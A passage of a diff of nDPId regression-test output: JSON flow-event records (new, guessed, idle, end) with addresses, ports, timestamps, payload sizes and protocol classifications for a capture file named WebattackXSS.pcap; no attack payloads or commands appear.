port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935283,"flow_last_seen":1499346935283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 